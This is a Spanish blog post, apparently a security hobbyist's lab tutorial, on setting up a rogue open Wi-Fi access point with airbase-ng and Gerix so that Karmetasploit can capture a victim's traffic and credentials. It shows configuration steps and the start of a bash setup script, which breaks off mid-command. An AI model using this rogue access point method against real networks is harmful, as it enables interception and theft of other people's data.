sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b></b></span></span></span><br /><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b></b></b></span></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b></b></span></span></b></b></span></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></b></span></span></b></b></span></span></span><br /><div style="text-align: center;"><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></span></b></span></span></b></b></span></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b></b></b></span></span></b></span></span></b></b></span></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b></b></b></b></span></span></b></span></span></b></b></span></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"></span></b></b></b></span></span></b></span></span></b></b></span></span></span><br /><div style="display: inline ! important; text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Ahora me quedo con las ganas de probar al hermano de Karmetasploit: </span></span><a href="http://www.digininja.org/jasager/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jasager</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, que es, básicamente, el script KARMA en la </span></span><a href="http://es.wikipedia.org/wiki/La_Fonera"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Fonera</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. Dejo aquí <a href="http://erewhon-network.net/wordpress/?p=3">este enlace</a> donde explican como configurarlo por si </span></span><a href="https://blogs.igalia.com/clopez/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">alguno</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> que tenga una se anima... ;)</span></span></span></b></b></b></span></span></b></span></span></b></b></span></span></span></div></div></div></div></div></div></div></div></div></div></div></div></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"></span></span></b></span></span></b></b></span></span></span><br /><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><br /></span></span></span></b></span></span></b></b></span></span></span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><br /></span></span></span></b></span></span></b></b></span></span></span></div></div></div></div></div></div></div></div></div></div></div></div></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b></b></span></span><br /><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b></b></span></span></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></b></span></span></b></b></span></span><br /><div style="text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"></span></span></b></span></span></b></b></span></span><br /><div style="text-align: left;"><div style="text-align: right;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></b></span></span></b></b></span></span></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></span></b></span></span></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b></b></b></span></span></b></span></span></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b></b></span></span></b></b></span></span></b></span></span></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></b></span></span></b></b></span></span></b></span></span></b></b></span></span><br /><div style="display: inline ! important; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-weight: normal;"></span></span></b></span></span></b></b></span></span></b></span></span></b></b></span></span><br /><div style="display: inline ! important; text-align: left;"></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-5655199157180798565?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-82770364532454575272010-04-05T15:59:00.215+02:002012-02-11T18:45:59.606+01:00Karmetasploit en Backtrack (I)<div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Hace algún tiempo a través de </span></span><a href="http://pentestit.com/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">PenTestIt</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> descubrí algo que me sorprendió mucho a primera vista: </span></span><a href="http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Karmetasploit</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, en la introducción del proyecto nos cuentan un poco de historia: </span></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: verdana;"></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> "La versión original de KARMA dependía de una versión modificada del controlador </span></span></span><a href="http://www.madwifi.org/"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Madwifi</span></span></span></a><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para tarjetas inalámbricas </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Atheros</span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Si bien este enfoque funciona, se limita a los tipos de tarjetas de red que se pueden utilizar y requiere un cierto esfuerzo para mantener el parche con la última versión del código fuente de madwifi. </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Para remediar esto, los desarrolladores de </span></span></span><a href="http://www.aircrack-ng.org/"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Aircrack-NG</span></span></span></a><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> (específicamente Hirte) desarrolló punto de acceso en modo</span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> usuario </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">que funciona con cualquier tarjeta inalámbrica que soporte el modo monitor y la inyección. </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Esta herramienta se llama 'airbase' y fue incluida en la versión 1.0rc1 de Aircrack-ng. No sólo </span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">resuelve los límites de hardware de utilizar un controlador madwifi parcheado, también hace mucho más fácil modificar e integrar nuevas funciones.</span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">"</span></span></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Después de realizar distintas pruebas(unas con más éxito que otras) siguiendo la información que iba encontrando observé que casi todos utilizaban las distintas posibilidades de combinación que ofrecen Aircrack-ng, </span></span><a href="http://trailofbits.com/karma/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Karma</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y </span></span><a href="http://www.metasploit.com/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Metasploit</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para conseguir disferentes tipos de ataques. Este tema me llamó mucho la atención y se me ocurrió unficar todo esto así que voy a darle unas vueltas al tema a ver que sale de aquí. A las herramientas mencionadas hay que añadir un componente de </span></span><a href="http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ingeniería social</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para conseguir que la víctima se conecte al nuestro punto de acceso pero no va ser necesario, veremos aún teniendo nuestra propia conexión, tendemos a usar las de los demás :). </span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: verdana;"></span></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: verdana;"></span></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Como cliente víctima voy a usar un equipo con el sistema operativo Windows 7 ya que la mayoría de los ejemplos que hay por ahí prueban con Windows XP sin actualizar(más adelante entenderemos el porqué). El ataque se va a dividir en dos partes fundamentales:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Montar el punto de acceso ficticio y dar acceso a las víctimas a Internet.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Arrancar el Karmetasploit para que capture todo lo que pueda.</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Para la primera utilizo la suite Aircrack-ng, más concretamente el paquete </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">airbase-ng</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, recientemente descubrí una interfaz gráfica que soporta algunas de sus funcionalidades y que me resulta muy cómoda para ahorrarme el reescribir comandos y parámetros al realizar auditorías en redes inalámbricas. Se llama </span></span><a href="http://www.backtrack.it/~emgent/hackstuff/old_gerix_wifi_cracker_ng/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Gerix Wifi Cracker</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y está incluida en de </span></span><a href="http://www.backtrack-linux.org/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Backtrack</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, no hay demasiado en la red sobre su uso, en este video los creadores muestran como utilizarlo para romper una clave WEP:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><object height="340" width="560"><param name="movie" value="http://www.youtube.com/v/r0olWYQ-Fsg&hl=en_US&fs=1&rel=0&hd=1"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/r0olWYQ-Fsg&hl=en_US&fs=1&rel=0&hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="340" width="560"></embed></object><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Creo el punto de acceso falso siguiendo estos pasos:</span></span></div><div><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Paso 1</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> - Ponemos la tarjeta en modo monitor en la pestaña de Configuración (</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Enable/Disable Monitor Mode</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">) y vemos que mantiene </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">wlan0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> como estaba y crea una nueva(</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">mon0</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">) en modo monitor.</span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S7IaszQqgGI/AAAAAAAAAD4/dvmGGyVXD-U/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="320" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S7IaszQqgGI/AAAAAAAAAD4/dvmGGyVXD-U/s320/Untitled.png" width="307" /></span></span></a></div><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Paso 2</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> - En </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Fake AP</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> se configuran los parámetros de la red inalámbrica, la dejaremos sin contraseña, simplemente definiremos un nombre y un canal, marcando la opción </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Respond to all probes</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(recomendación de Karmetasploit) . Al arrancarlo se abre un </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">xterm</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> con el comando ejecutado en la cabecera de la ventana para que sepamos los parámetros exactos que se le pasan a </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">airbase-ng</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">:</span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><a href="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S7IhBtsIHdI/AAAAAAAAAEI/7B3NdJ7wPCE/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: verdana;"></span></span></a></div><div style="margin: 0px;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S739b4PBIsI/AAAAAAAAAGA/9SMYlBU9dxg/s1600/imagen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="320" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S739b4PBIsI/AAAAAAAAAGA/9SMYlBU9dxg/s320/imagen.png" width="305" /></span></span></a></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Ahora si buscamos redes inalámbricas en el equipo cliente vemos que ya aparece la nueva.</span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"></div><div style="text-align: center;"><div style="margin: 0px;"><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S7NXRiQ-cyI/AAAAAAAAAEo/xvPkgRfTdLw/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="58" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S7NXRiQ-cyI/AAAAAAAAAEo/xvPkgRfTdLw/s320/Untitled.png" width="320" /></span></span></a></div></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div style="margin: 0px; text-align: left;"><div class="separator" style="clear: both; margin: 0px; text-align: center;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S7JIuuj1jpI/AAAAAAAAAEY/oPInDvVTheU/s1600/otra.png" imageanchor="1" style="display: inline ! important; margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="200" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S7JIuuj1jpI/AAAAAAAAAEY/oPInDvVTheU/s200/otra.png" width="140" /></span></span></a></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Paso 3</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> - En este punto yo utilizo el siguiente script para compartir la conexión a internet y terminar la configuración del entorno :</span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">#!/bin/bash</span></span></i></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">## NOTE: Replace YOURESSID with the essid you want </span></span></i></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">## to connect and its key(ASCII) and YOURIFACE for </span></span></i></div><div class="separator" style="clear: both; margin: 0px; text-align: left;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">## your interface with access to internet.</span></span></i></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><i></i></span></span><br /><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># delete old database</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">rm karma.db</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># stops running services (if any)</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">killall dhcpd3</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># connects to internet (if not)</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ifconfig YOURIFACE down</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">iwconfig YOURIFACE essid YOURESSID key s:YOURKEY</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">dhclient YOURIFACE</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"># shares internet conexion</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">echo 1 > /proc/sys/net/ipv4/ip_forward</span></span></i></div><div style="margin: 0px;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">iptables -t nat 